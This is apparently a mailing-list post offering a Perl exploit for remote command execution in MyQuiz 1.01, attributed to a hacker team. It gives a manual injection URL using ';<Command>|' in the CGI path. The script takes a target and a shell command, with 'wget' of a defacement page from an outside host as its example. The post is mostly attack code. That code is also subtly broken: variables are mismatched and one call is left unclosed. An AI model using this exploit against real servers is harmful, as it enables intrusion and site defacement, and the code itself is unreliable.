<<< Date Index >>>     <<< Thread Index >>>

MyQuiz Arbitrary Command Execution Exploit (perl)



This Perl Exploit for MyQuiz 1.01 Arbitrary Command Execution Exploit.
Athour : Hessam-x - www.hessamx.net
+IHST : iran hackerz security team (hackerz.ir)

#((Perl exploit))

#!/usr/bin/perl
# => MyQuiz Remote Command Execution Exploit
# -> By Hessam-x  / www.hackerz.ir
# manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;<Command>|
# Iran Hackerz Security Team
# Hessam-x : www.hessamx.net
use LWP::Simple;      

print "Target(www.example.com)\$ ";
chomp($targ = <STDIN>);
print "path: (/cgi-bin/)\$ \n";
chomp($path=<STDIN>);
print "command: (wget www.hackerz.ir/deface.htm)\$ \n";
chomp($comd=<STDIN>);
$page=get("http://".$targ.$patch) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";
print "[~] Sending exploiting request, wait for some seconds/minutes...\n";
get("http://".$ARGV[0].$ARGV[1]."\;".$comd."\|"
print "[+] Exploiting request done!\n";
print "Enjoy !";